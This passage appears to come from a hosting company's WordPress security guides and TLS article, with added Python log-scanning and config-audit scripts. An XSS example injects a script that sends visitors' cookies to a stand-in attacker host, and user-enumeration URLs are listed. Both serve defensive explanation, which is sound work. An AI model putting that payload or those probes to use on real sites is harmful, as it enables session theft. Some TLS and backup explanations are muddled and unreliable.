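    return f'{ip} - - [{stamp} +0000] "{method} {path} HTTP/1.1" {status} 4521 "-" "constructed-sample"'


T0 = datetime(2022, 1, 11, 10, 0, 0)
SAMPLE_LOG = (
    # eight failures ten seconds apart from one address
    [make_line("203.0.113.7", T0 + timedelta(seconds=10 * i), 200) for i in range(8)]
    # a user who mistypes twice and then logs in
    + [make_line("198.51.100.20", T0 + timedelta(seconds=30 * i), s)
       for i, s in enumerate([200, 200, 302])]
    # six failures spread over a day never fill the window
    + [make_line("192.0.2.44", datetime(2022, 1, 11, 1) + timedelta(hours=3 * i), 200)
       for i in range(6)]
    + [make_line("203.0.113.7", T0, 200, method="GET")]
)

if __name__ == "__main__":
    for ip, stats in simulate_lockouts(SAMPLE_LOG).items():
        print(ip, stats)
```

Running the same replay over a real log before enabling a limiter shows which addresses the chosen values would block and whether any regular users would be caught.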

Enable Two-factor authentication

Two-factor authentication means that everyone logging in has to enter a unique one-time code that the WordPress site sends via email or SMS, or generates on another device. Two-factor authentication can significantly improve website security for your managed WordPress hosting site and provides an extra layer of defense.

One of the easier ways to do this for your managed WordPress hosting site is by using the Google Authenticator plugin that's available for download from the official WordPress repository. It offers two-factor authentication via a mobile app.

After installing everything, you log in to your WordPress site with your username and password. You'll be requested to enter a 6 digit code from the mobile app. The code changes every 30 seconds and can be generated only on the app that is paired with your user account.

Please note: In order for this to work, you must have the Authenticator app installed on your smartphone.

Encrypt your information with TLS (TLS/SSL Certificate)

When you or your managed WordPress hosting team add or alter anything on your site, the information is transferred from one server to another. Hackers could intercept that information stream and use it to steal data or hack into your site. But a TLS certificate encrypts the data so that if it was intercepted, no hacker would be able to read it.

The TLS certificate is based on unique encryption keys installed on the website’s server. Your computer can only decrypt the information using those encryption keys.
You can acquire a TLS certificate for free with most hosting providers, using Let's Encrypt.

uPress customers: You can install a TLS certificate from the security tab in our management panel.

A secure WordPress site begins with a secure setup

Data security in self-managed and managed WordPress hosting websites is a sensitive topic that should not be taken lightly, especially when you’re dealing with a website containing sensitive information. Each and every one of the tips and methods mentioned above will take you one step closer to a safe, secure website. When you begin with a secure foundation, you'll find it much easier for you or your managed WordPress hosting team to keep your site secure for the long term.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on preventative maintenance, ensuring security, or you just want to know what's slowing down your site. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

The Complete WordPress Security Guide Part 2 https://www.upress.io/wp-security-guide-2/ Tue, 22 Dec 2020 08:10:58 +0000 https://www.upress.io/?p=573 Part 1 of this security-based miniseries discussed the vital foundations that you need to lay to set up a secure website, but it doesn’t end there. Part 2 discusses tips to help you to keep your WordPress site secure long-term from updating non-active plugins and themes to preventing and blocking bad bots.

The Complete WordPress Security Guide part 2: Maintaining a secure WordPress site

Security is top of the list of concerns for website owners. You want to protect your company's business data, and you need to comply with data and privacy regulations to make sure that your customers' details aren't breached.

This makes secure managed WordPress hosting a crucial issue, but there are also other steps you need to take to protect your website. We've already discussed the vital foundations that you need to lay to set up a secure website, but it doesn’t end there.

Building a secure WordPress hosting or self-managed site is the first and critical step in keeping your website protected from hackers and malicious actors, but maintenance is crucial too. This section discusses tips to help you to keep your WordPress site secure over the long term.

* This guide is aimed at WordPress websites hosted on a Linux server, but may be relevant for secure WordPress hosting on Windows servers as well.

Keep WordPress up to date

Both your core WordPress and your plugins and themes need to be kept up to date if you want secure WordPress hosting and a safe website.

WordPress developers regularly upgrade the system to improve it in different ways. They add new features, improve its stability and performance, and enhance existing feature performance in order to stay up to date with today's standards.

Most importantly, updates also fix bugs that were found since the previous release, as well as adding proactive security fixes and improvements.

WordPress is an open-source system that is widely available online, so every security issue in older releases is well known across the internet, and sites running them are easy prey for hackers who target old and outdated software. For example, security experts Sucuri recently wrote about a cross-site scripting (XSS) vulnerability that was fixed in WordPress version 5.1.1. If your WordPress version is out of date, its security flaws are well known, and exploiting them is easier for attackers than trying to find new flaws and exploits in newer WordPress versions.

That's why it's so important to regularly update your site to the latest version of WordPress.

By default, WordPress automatically installs minor updates, but for major releases you must enable the Automatic Updates feature in the Systems Update menu.

Additionally, you should never perform any changes to WordPress' core files for your secure WordPress hosting site. Because updating WordPress usually deletes your changes, it makes you less likely to want to carry out updates, and that will directly impact your website security and lead to potential security breaches and other issues in the future.

uPress Customers: The main dashboard shows 2 toggles for automatic updates under the WordPress tab, one for the core WordPress releases and another for plugin updates. Toggle them both to "On."

Closely monitor activity on your website

Another way to ensure secure WordPress hosting for your site is to closely monitor crucial activities that happen in the management area, both in real-time and past activity. That's not something you can handle manually, so you'll need a logging plugin that'll run in the background and document every action.

When you utilize these plugins as part of your secure WordPress hosting, you’ll always be able to see which users logged on to your website, what they edited, which changes were made, what plugins were added/removed, which media files were uploaded, which configuration changes were made, and more. It helps you correct mistakes that could leave your secure WordPress hosting site vulnerable to attack, and spot suspicious behavior that could be a sign of malicious action.

To do all this, you can use the plugin ARYO Activity Log, which is available for download from the official WordPress plugin repository.

Keep regular backups

A good, trustworthy backup system is the first tool in your secure WordPress hosting arsenal against WordPress security exploits. Remember, no website is 100% secured at all times, so you need a way to fix everything if the worst should happen and your site gets hacked.

Bear in mind that government and international corporate websites are hacked into on a daily basis, so your smaller website is vulnerable too. Having an accessible backup allows you to quickly recover from a breach in your secure WordPress hosting by restoring your data from a version that is known to be secure and safe.

You can and should backup your WordPress websites in a few different places:

  • At the server level. It's recommended to perform a daily backup for your secure WordPress hosting at least every 30 days, if not more often, and it's even better if the backups are stored on a different server.
  • Using a trusted backup plugin. This is a less reliable option, but it can be a valid secondary backup system. There are a few free or premium plugins available, such as VaultPress or UpdraftPlus. We recommend using a plugin that can send backups to an external cloud storage service like Dropbox or OneDrive.

Use the 3-2-1 rule: keep at least 3 copies of the data, in at least 2 locations, with at least 1 copy off-site.

Remove non-active plugins and themes

In August 2011, it was revealed that the popular script TimThumb was vulnerable to malicious exploits. TimThumb was and still is included in many popular WordPress plugins and themes. Within days we saw attackers using this vulnerability to their advantage, ranging from spamming WordPress sites with promotional material for other websites (SEO hijacking) to modifying PHP files that are stored on the server with random, meaningless characters at best, or even injecting other malicious code and exploits.

Most website owners didn’t realize that the script (and the malware) was running on their server and compromising their secure WordPress hosting. Some of them deactivated the problematic plugin or theme, but did not completely remove them. Deactivating the plugin or theme was meaningless and didn’t help at all, since the vulnerability remains as long as the problematic code exists on the server.

The Golden Rule for plugins and themes is if you’re not using a plugin or theme – delete it!

Block and prevent Bad Bots

Most hackers tend to send "spies" to check on a website before they start an attack. These are what we call "Bad Bots."

Bad Bots affect your website's performance, steal your content, occupy your valuable bandwidth, badly sabotage your website statistics, and most importantly, they look for security vulnerabilities in your secure WordPress hosting.

You can find a long list of bots that have been marked as "bad" at botreports.com. If you're using a security plugin or secure WordPress hosting service, you're probably already blocking the bots on this list.

uPress customers: There's a "block bad bots" toggle under the security tab in our management panel.

Understand the minimum requirements for a secure server

Your managed WordPress hosting service plays the most important part in securing your WordPress website, so it’s vital to find a secure WordPress hosting service.

A secure WordPress hosting company should:

  • Closely monitor new and existing security threats around the web, taking extra measures to secure WordPress hosting servers.
  • Be capable of withstanding a DDoS attack.
  • Regularly maintain the core components of the server, frequently updating them to prevent any chance of security vulnerabilities.
  • Offer a Disaster Recovery feature and a contingency plan, in case of an emergency.
  • Support PHP version 7.2 and MySQL version 5.5 and up.
  • Completely separate different users on a shared secure WordPress hosting service.
  • Run a built-in firewall, preferably WAF that offers options specifically for secure WordPress hosting, and a Network Intrusion Detection System that regularly scans website activity.
  • Frequently scan websites on your secure WordPress hosting server and update you about them when necessary.
  • Enable you to track any file changes on your website.

Maintaining a secure WordPress site is an ongoing task

As you can see, setting up a secure WordPress site using secure WordPress hosting is important, but it's not enough to protect your website forever. Using a secure WordPress hosting service that meets certain requirements for a secure server goes a long way to helping you maintain your secure site, but you also need to take responsibility for keeping your WordPress version up to date and backed up, monitoring website activity, removing disused plugins and themes and blocking and preventing bad bots.

We hope you found this guide useful. Do you have anything to add, or want to give your own advice for securing a WordPress website? Or, if you have any questions about managed WordPress hosting in general, we'll be happy to hear from you!

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on backups, plugins, or security. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

The Complete WordPress Security Guide Part 3 https://www.upress.io/wp-security-guide-3/ Sat, 12 Dec 2020 09:53:00 +0000 https://www.upress.io/?p=577 Ready for the big guns? Parts 1 and 2 of this security-based miniseries walked you through what needs to be done and how to do it. Part 3 is advanced information for developers and WordPress admin experts to build and maintain secure WordPress sites.

The Complete WordPress Security Guide part 3: Advanced information for web managers

Setting up and maintaining a secure WordPress site is a complex undertaking. When you're providing managed WordPress hosting services, your clients are relying on you to keep their website fully secure from hackers, malicious actors, and any security vulnerabilities.

Of course, you are welcome to review Part I and Part II of this series for all the tips in a comprehensive guide, but keep in mind that the first two installments are for a Non-Geek audience while this one is for web developers, so it's definitely solidly in the Geek category.

But you know that although WordPress core systems are highly secure, there are a lot of potential holes in plugins, themes, and updates that you need to close up, plus there's the ongoing risk that a user or WordPress admin could make changes that undermine all your hard work. Here are some of our tips for web developers, WordPress admin experts, and advanced programmers to build and maintain secure WordPress sites.

Note: This blog post is aimed at advanced WordPress developers and is written in Geek.

* This guide is aimed at WordPress websites hosted on a Linux server, but may be relevant for a WordPress admin for sites hosted on Windows servers as well.

Disable the option to edit files from within the WordPress dashboard

By default, WordPress allows users to edit theme and plugin files through a dedicated code editor in the dashboard. In the wrong hands, this tool can be extremely dangerous and a massive security risk. An untrained but well-meaning WordPress admin could accidentally add arbitrary code to your plugin or theme, and that's why we recommend disabling this option completely.

It's far safer for a WordPress admin to edit code files only through an FTP client or a built-in file manager offered by your hosting provider.

To disable the option of editing the files through WordPress, add the following code to your website’s "wp-config.php" file. Make sure to add it above the line /* That's all, stop editing! Happy blogging. */

define('DISALLOW_FILE_EDIT', true);

Restrict access to the login/management areas

Hackers and malware try to access the wp-admin or wp-login.php areas of your website without any restrictions. If you control the firewall, we highly recommend restricting the access to these areas exclusively to the country you or your team are based in, or take it a step further and restrict it to certain IP addresses.

A WordPress admin can also protect these areas using a password on the server side that basically provides an extra layer of defense before the hacker/malware operator can access said areas. This is popular in Linux OS-based Apache servers.

Disable XML-RPC Protocol

The XML-RPC protocol is enabled by default in WordPress from version 3.5 and up to help remotely connect your WordPress website with other websites and services. Your WordPress admin might appreciate it, but it's a big security hole that can be used to attack your own or other websites.

For example, hackers or malware that try out 100 different passwords to access your account would have to make 100 separate attempts to login, giving your security systems the opportunity to recognize and block their attempts.

If XML-RPC is active, they can use the default-enabled function system.multicall to try thousands of different passwords in a far smaller number of attempts.

As a WordPress admin, you can limit the XML-RPC connection by:

  • Blocking access to the xmlrpc.php file in your firewall or in your server configuration (e.g. .htaccess or nginx.conf files).
  • Installing a plugin like Disable XML-RPC, which is available for download through the official WordPress repository.

uPress Customers: there is an XML-RPC toggle under the security tab which disables the protocol by default.

Apply a user protection program

By default, WordPress websites make it possible to access the user's post archive which lists all of their published posts. Bots can utilize this hole to read the user’s sensitive information by Brute Forcing their user-ID, like this:

https://www.domain.co.il/?author=1
https://www.domain.co.il/?author=2
https://www.domain.co.il/?author=3

We recommend that a WordPress admin blocks this path:

https://www.domain.co.il/?author=*

Another issue is that WordPress version 4.7 and up includes and enables Rest API by default, as part of the core WordPress components. The Rest API allows users to easily access information from a database on a remote server (e.g. a WordPress site) using HTTP, making it easier for hackers and malware operators who are trying to steal user information.

For example, following this URL:

https://www.domain.co.il/wp-json/wp/v2/users

generates an organized JSON output of all the users on your website and their information.

It's not possible to completely disable this feature, because part of it is used by WordPress and certain plugins like the new visual editor Gutenberg. Instead, we recommend your WordPress admin blocks sensitive paths that can be utilized by Rest API.

The WordPress admin can block it by:

  • Using your firewall to block wp-json/wp/v2/users
  • Using .htaccess or nginx.conf to block wp-json/wp/v2/users
  • Using a plugin like Disable Rest API that allows you to block specific or all Rest API paths for non-logged-in users. The plugin is available for download from the official WordPress repository.

uPress customers: There’s a REST API toggle under the security tab.
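To check whether the paths described above are being probed, look at the web server's access log. The following is an added example (not uPress or WordPress code) that scans combined-format log lines for ?author=N enumeration, requests to wp-json/wp/v2/users, and bursts of POSTs to xmlrpc.php. The log lines, IP addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Thresholds are assumptions of this example; tune them to your traffic.
AUTHOR_ID_THRESHOLD = 3    # distinct ?author=N values from one IP
XMLRPC_POST_THRESHOLD = 3  # POSTs to xmlrpc.php from one IP

# Start of an Apache/nginx "combined" log line: ip, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
USERS_PATH = "/wp-json/wp/v2/users"


def _entry(ip, method, target, status):
    """Build one constructed log line for the sample below."""
    return (f'{ip} - - [11/Jan/2022:10:00:00 +0000] '
            f'"{method} {target} HTTP/1.1" {status} 0 "-" "constructed-sample"')


# Constructed sample input (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    _entry("203.0.113.7", "GET", "/?author=1", 301),
    _entry("203.0.113.7", "GET", "/?author=2", 301),
    _entry("203.0.113.7", "GET", "/?author=3", 404),
    _entry("203.0.113.7", "GET", "/wp-json/wp/v2/users", 200),
    _entry("198.51.100.20", "POST", "/xmlrpc.php", 200),
    _entry("198.51.100.20", "POST", "/xmlrpc.php", 200),
    _entry("198.51.100.20", "POST", "/xmlrpc.php", 200),
    _entry("192.0.2.15", "GET", "/?author=1", 301),   # one author page: normal
    _entry("192.0.2.15", "GET", "/blog/post/hello/", 200),
]


def scan(lines):
    """Return sorted (ip, alert, count) tuples for the three patterns."""
    author_ids = defaultdict(set)
    users_hits = defaultdict(int)
    xmlrpc_posts = defaultdict(int)

    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method = m["ip"], m["method"]
        url = urlsplit(m["target"])
        path = url.path.rstrip("/")

        # ?author=<number> walks the author archives by user ID.
        for value in parse_qs(url.query).get("author", []):
            if value.isdigit():
                author_ids[ip].add(int(value))

        # The user listing itself, or a single user below it.
        if path.endswith(USERS_PATH) or (USERS_PATH + "/") in url.path:
            users_hits[ip] += 1

        if method == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_posts[ip] += 1

    alerts = []
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_ID_THRESHOLD:
            alerts.append((ip, "author-enumeration", len(ids)))
    for ip, count in users_hits.items():
        alerts.append((ip, "rest-users-listing", count))
    for ip, count in xmlrpc_posts.items():
        if count >= XMLRPC_POST_THRESHOLD:
            alerts.append((ip, "xmlrpc-post-burst", count))
    return sorted(alerts)


if __name__ == "__main__":
    for ip, alert, count in scan(SAMPLE_LOG):
        print(f"{ip}\t{alert}\t{count}")
```

Because system.multicall packs many login attempts into one request, a low xmlrpc.php request count does not mean a low attempt count, which is why blocking the file remains the fix.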

Hide your WordPress version

WordPress automatically embeds a meta tag in your source code that contains information about the WordPress version you use.

<meta name="generator" content="WordPress 4.9.10">

This information is accessible to everyone, including hackers and malware. When they know which WordPress version your website is running, they can choose the best tactics to use against this specific version.

Older versions are more likely to have known security holes that malicious actors can exploit to enter your WordPress admin system. It's not surprising that hackers tend to look for sites with older versions of WordPress.

That's why we strongly recommend keeping WordPress up-to-date, but you should also hide your WordPress version by adding the following code to the functions.php file of your theme:

remove_action('wp_head', 'wp_generator');

Take care of XSS exploits

An XSS (Cross-Site Scripting) attack is when malicious scripts are injected into your website, usually as client-side code, and are then downloaded and run in your visitors' browsers.

For example, you could inject an XSS script by simply adding the script as a comment on a post, like this:

<script>window.location="http://attacker-website/?cookie="+document.cookie</script>

If your WordPress admin isn't prepared for XSS exploits, every user who enters the contaminated article will load the comment section and start the script running on their own browser. (A protected website will show the script as plain text.)

WordPress knows how to deal with XSS-filled comments by default, using built-in filtering and sanitization features. But XSS scripts can be injected in many other places, not just the comment section. They could be added to a search field, a contact form, etc.

The best way for a WordPress admin to protect a site from XSS exploits is by sanitizing the data before outputting the content.

Hide PHP errors

WordPress comes with an error reporting system as part of its core components. This is great for developers who want to debug coding errors in plugins or themes, but not so great for a WordPress admin who wants to secure a WordPress site, because it gives valuable information to hackers and malware operators to help them penetrate the site.

For example, a PHP error in WordPress would usually look like this:

PHP: syntax error , unexpected '^' in /wp-content/plugins/plugin.php on line 6

We recommend hiding PHP error messages by editing the wp-config.php file with the following code:

ini_set('display_errors', 'Off');
ini_set('error_reporting', E_ALL);
define('WP_DEBUG', false);
define('WP_DEBUG_DISPLAY', false);

Reset file and folder permissions

Make sure WordPress admin permissions are set up according to official WordPress guidelines. A folder with a permission of 777 allows anyone to read and write files in the folder.

These are the recommended permissions for a WordPress website:

  • wp-config.php: permission of 600
  • All files: permission of 644 or 640
  • All folders: permission of 750 or 755

* You can adjust the permissions of files and folders through an FTP client, and by using a Reset Permissions button on some hosting services.

uPress customers: There's a reset permissions button for all files and folders to WordPress' recommendation under Development → Additional Tools for Web Hosting.

Use Authentication keys

By default, WordPress installations come with a wp-config.php file that contains empty encryption keys. When you install WordPress, the system should generate authentication keys, also called security keys, to encrypt and decrypt the information stored on registered users' cookies, such as user name and password.

This is how authentication keys are set by default:

define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');

And this is how authentication keys should look:

define('AUTH_KEY', 'X<@vIF23>d~#%kYe^_>xhv~xUJ*ia*y+ALlJLGv7qFJe<EnpEwD:g~~&$}+DC5eF');
define('SECURE_AUTH_KEY', 'nA@GM?#u7v99Yk+8sM|+ZeF;]P74f`2v|z]{dKS|+cojC.w<&o4LeGvv-]$FWX4^');
define('LOGGED_IN_KEY', 'UNOk*x]$V_a]]vtKZM>`gs2Ht^O/`Rl|>EJzO9/*Y|)tJ2`&rg8FZ 5`l,67)`1U');
define('NONCE_KEY', 'pc-UFE^.+7?+vPD^,i& ^^R?+|I-q+7p>?d2*NZ|zUf|?e&v&?6iz-gF+~m*?(L=');
define('AUTH_SALT', '7n_U|q1kJ)s)8_#5sb! FY]l)Y!Eyyse85!/$G>qh(XbTYpefVxC_M/naQKhM#PL');
define('SECURE_AUTH_SALT', 'Mw^0=5J5:TWi;fl|*$l|i]f7Gyw-}1@-G5ZPc1atjhg@8v#&& ?1re#D!vtE:g&^');
define('LOGGED_IN_SALT', '~hZF}x2b&F^Q-WQK8^q>5pS!|6eT^<6z!WSNcv;Jd&8mY2T9M`:S Z ;OYGd[{$e');
define('NONCE_SALT', 'rH&yz6/_S0hXVnJOJ28?]EME!}s>V<%+<[e;FEl:d)t>+P%|atn+Ktq-lpk{+WIM');

If you don't have unique authentication keys configured in your wp-config.php file, we recommend that a WordPress admin creates them at the dedicated WordPress security keys generator and configures them into your wp-config.php.
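The wp-config.php settings recommended in this guide can be checked automatically. The following is an added example (not uPress or WordPress code) that parses the define() calls in a wp-config.php and reports placeholder, missing or reused keys, a missing DISALLOW_FILE_EDIT, and debug output left on. The sample file content and the minimum key length are constructed assumptions.

```python
import re

# The eight key/salt constants listed in the guide.
KEY_NAMES = [
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
]
PLACEHOLDER = "put your unique phrase here"
MIN_KEY_LENGTH = 32  # assumption of this example, not a WordPress rule

# define('NAME', 'single-quoted' | "double-quoted" | bare_token)
# Quoted values are matched as whole strings, so ')' or ';' inside a key is fine.
DEFINE_RE = re.compile(
    r"define\(\s*['\"](\w+)['\"]\s*,\s*"
    r"(?:'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"|(\w+))\s*\)"
)

# Constructed sample: placeholder, reused, short and missing values.
SAMPLE_WEAK = r"""<?php
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'constructed-1 k)9;v(q`w|z]{d&o4LeG -- sample only');
define('LOGGED_IN_KEY',    'constructed-1 k)9;v(q`w|z]{d&o4LeG -- sample only');
define('NONCE_KEY',        'short');
// define('DISALLOW_FILE_EDIT', true);
define('WP_DEBUG', true);
"""


def parse_defines(text):
    """Map constant name -> value (str for strings, bool for true/false)."""
    defines = {}
    for line in text.splitlines():
        # Skip comment lines so a commented-out define() is not counted.
        # (Code inside multi-line /* ... */ blocks is not detected.)
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue
        for m in DEFINE_RE.finditer(line):
            name, single, double, bare = m.groups()
            if bare is not None:
                defines[name] = {"true": True, "false": False}.get(bare.lower(), bare)
            else:
                defines[name] = single if single is not None else double
    return defines


def audit_wp_config(text):
    """Return a list of findings; an empty list means all checks passed."""
    defines = parse_defines(text)
    findings = []
    real_values = []
    for name in KEY_NAMES:
        value = defines.get(name)
        if not isinstance(value, str) or not value.strip():
            findings.append(f"{name}: missing or empty")
        elif value == PLACEHOLDER:
            findings.append(f"{name}: default placeholder")
        else:
            real_values.append(value)
            if len(value) < MIN_KEY_LENGTH:
                findings.append(f"{name}: shorter than {MIN_KEY_LENGTH} characters")
    if len(set(real_values)) != len(real_values):
        findings.append("keys/salts: the same value is used more than once")
    if defines.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT: not set to true")
    for name in ("WP_DEBUG", "WP_DEBUG_DISPLAY"):
        if defines.get(name) is True:
            findings.append(f"{name}: set to true")
    return findings


if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE_WEAK):
        print(finding)
```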

Disable PHP files in folders

Tighten up website security by disabling the option of running PHP files in folders that do not require them. For example, the folder /wp-content/uploads/ isn't supposed to contain any PHP files.

Disabling this possibility effectively blocks hackers and malware from running PHP files containing security exploits that may exist in this folder.

You can use a .htaccess file to perform this block:

# .htaccess - Disable PHP Execution
# Apache 2.2 syntax; on Apache 2.4 without mod_access_compat, use "Require all denied" instead.
<Files *.php>
Order Allow,Deny
Deny from all
</Files>

uPress customers: This option is an integral part of our management panel and is set to block PHP files in the uploads directory by default.
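The permission table and the uploads rule from the two sections above can be checked in one pass over the site directory. The following is an added example (not uPress or WordPress code) that walks a WordPress root and reports files and folders whose mode differs from the recommended values, plus any .php file under wp-content/uploads. Passing the root as a command-line argument is an assumption of this example.

```python
import os
import stat
import sys

# Recommended modes from the guide.
CONFIG_MODE = 0o600
FILE_MODES = {0o644, 0o640}
DIR_MODES = {0o750, 0o755}
UPLOADS = os.path.join("wp-content", "uploads")


def audit_tree(root):
    """Return sorted (relative_path, issue) tuples for a WordPress root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)

        dir_mode = stat.S_IMODE(os.lstat(dirpath).st_mode)
        if dir_mode not in DIR_MODES:
            findings.append(
                (rel_dir, f"directory mode {dir_mode:o}, expected 750 or 755"))

        in_uploads = rel_dir == UPLOADS or rel_dir.startswith(UPLOADS + os.sep)

        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            info = os.lstat(path)
            if stat.S_ISLNK(info.st_mode):
                continue  # a symlink's own mode bits are not meaningful
            mode = stat.S_IMODE(info.st_mode)

            if rel == "wp-config.php":
                if mode != CONFIG_MODE:
                    findings.append((rel, f"mode {mode:o}, expected 600"))
            elif mode not in FILE_MODES:
                findings.append((rel, f"file mode {mode:o}, expected 644 or 640"))

            # The uploads folder is not supposed to contain PHP files at all.
            if in_uploads and name.lower().endswith(".php"):
                findings.append((rel, "PHP file under wp-content/uploads"))
    return sorted(findings)


if __name__ == "__main__":
    site_root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, issue in audit_tree(site_root):
        print(f"{rel}: {issue}")
```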

Secure vital files

The wp-config.php file probably contains the most sensitive information about your website, including access credentials for your database and authentication keys and settings. As WordPress admin, you should block direct access to the file immediately.

This can be done using the .htaccess file:

# .htaccess - Protect wp-config.php
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>

uPress customers: This option is an integral part of our management panel and access to this file is blocked by default.

The WordPress admin should also secure the .htaccess file, which contains your website's server configuration. If you're using an Apache server, you'd usually protect it on the server level, but if that's not possible you can use the .htaccess file to protect itself:

# .htaccess - Protect .htaccess
<Files ~ "^.*\.([Hh][Tt][Aa])">
Order Allow,Deny
Deny from all
Satisfy all
</Files>

Securing a WordPress site requires constant vigilance

When you're a WordPress admin, you can never let down your guard (and we can say the same, as managed WordPress hosting experts - we can never let our own guard down, much less that of our clients!) We've shared some useful tips that can help make it easier and faster to secure a WordPress site, whether you’re offering managed WordPress hosting services, WordPress development, or ongoing WordPress support as a WordPress admin. Disabling and blocking as many open security holes as possible and keeping WordPress security patches updated are the most crucial steps in frustrating would-be hackers and malicious actors, but we could go on and on.

As managed WordPress hosting experts, we speak your language. We can geek out with you about comprehensive WordPress security, but we can also discuss XML-RPC Protocol, Rest API paths, and XSS exploits. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

uPress Provides a Safer, More Secure Internet with SSL Certificates - at No Extra Cost https://www.upress.io/upress-ssl/ Mon, 30 Nov 2020 07:33:59 +0000 https://www.upress.io/?p=560 How can you increase security for your eCommerce site? Since credit card fraud is so common, you need to find ways to reassure your customers that it’s safe to buy from you. Learn how to use a (free!) SSL certificate to ensure security and confidence.

How to increase security for eCommerce web hosting

Credit card fraud is distressingly common, and no one wants to be the one to suffer. These understandable concerns about fraud and theft make many people wary of using their credit card to make purchases online, but when you're running a business website through eCommerce web hosting, you need to find ways to reassure people that it's safe to buy items from your site.

Fortunately, today's security solutions have kept up with advances in credit card fraud, and now there are a number of ways to increase security for eCommerce web hosting and encourage customers to carry out online transactions. As managed WordPress hosting experts, we know that one effective, easy, option is to use SSL certificates on your site.

What is SSL?

Because the owners of online businesses need secure eCommerce web hosting that protects customer information, standards were set up to secure data. The first was the Secure Sockets Layer Protocol, or SSL, which encrypted data streams so they couldn't be read by hackers. SSL (and its successor TLS) exists to encrypt data for security, not to save data as some people mistakenly think.

Over time, newer and more effective protocols were developed and SSL became deprecated. The Transport Layer Security (TLS) Protocol became the standard that was established for the transmission of secure information over the internet, but people tend to use SSL and TLS interchangeably to refer to secure data transmission over the internet.

Why use a TLS/SSL certificate with your eCommerce web hosting?

When you apply an SSL certificate to your WordPress site on eCommerce web hosting, it turns your web address from http:// to https://. This change is one that customers already widely recognize as a sign that they can trust this website to keep their sensitive financial information secure.

When your eCommerce web hosting uses an SSL certificate, it encrypts all the sensitive information that travels through the internet. Information that’s been encrypted with an SSL key can only be decrypted and read by the server or domain that has the key, which means only the legitimate, trusted sites that were designated to receive it can read it.

This is immensely important because when information travels between computers and devices, there are malicious actors trying to hack into the information stream. If they succeed in hacking into unencrypted information, they can easily read everything in it, including credit card numbers, usernames, passwords, residential addresses, etc.

How does a TLS/SSL certificate work to secure sites using managed WordPress web hosting for eCommerce?

Both TLS and SSL certificates work in the same basic way, using the public key/private key principle:

  • A public key sits between the server (i.e. your website) and the client (i.e. your customer), but the private key is only stored on the server side.
  • When a request is sent to the server, the browser encrypts the data using the public key. This encryption can only be unlocked using the private key.
  • When the server accepts the request, it verifies the information was received correctly and decrypts it by combining both the public and private keys before passing the information on to the application (e.g. your WordPress online store).

What is the Encryption Function?

The encryption function basically verifies that the client has connected to the correct server. It then creates a secure communication channel by encrypting information passed between the user and your website. The encryption function makes sure that all the data reaches your website, without any errors or disruptions. If there is a mistake, the server will request an automatic replay from the browser.

Why is encryption important for eCommerce-based managed WordPress hosting?

  • Encryption prevents unauthorized entities from reading information passed between the client and the server; that kind of interception is called a Man-in-the-Middle attack;
  • Enables customers to buy goods and services using a credit card;
  • Secures sensitive information that’s transferred online, like addresses, driver's license numbers, passport or identity numbers, bank account information, etc.;
  • Google prioritizes sites with a TLS/SSL certificate and boosts them in its search engine rankings.

How to get a TLS/SSL certificate

We're happy to tell you that uPress allows you to install unlimited TLS/SSL certificates for no extra cost.

If you aren't a uPress Customer

Visit our Packages for Non-Geeks page to select the right managed WordPress web hosting package for your eCommerce needs, or reach out to us and ask us directly!

If you are a uPress customer
  • Enter your Management Panel and look below the Security tab
  • You'll see a category marked "TLS/SSL Certificate"
  • Click "Send Certificate Request"

The uPress team will quickly and professionally add the TLS/SSL Certificate to your WordPress site on your eCommerce web hosting. You will be notified as soon as the installation process is complete.

SSL/TLS certificates are vital for a secure eCommerce site

Now that you understand the many benefits of a TLS/SSL certificate, the role of encryption, and how encryption works, you can steam ahead and add a TLS/SSL certificate to your WordPress site.

At uPress, it's our goal to provide all our customers with TLS/SSL certificates to make sure your managed WordPress hosting experience is more reliable and secure.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on using SSL certificates, what other preventative maintenance you need to perform, or you just want to know why your site is running slow. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Why is it important to use the latest version of WordPress? Part 1 https://www.upress.io/latest-version-of-wordpress/ Sat, 26 Sep 2020 11:29:00 +0000 https://www.upress.io/?p=590 Every time a new WordPress version is released, our customers ask us if they should update their theme. Is it safe? What are the pros and cons of updating to the latest version? Learn about the potential effects of an update on your security, features and performance.

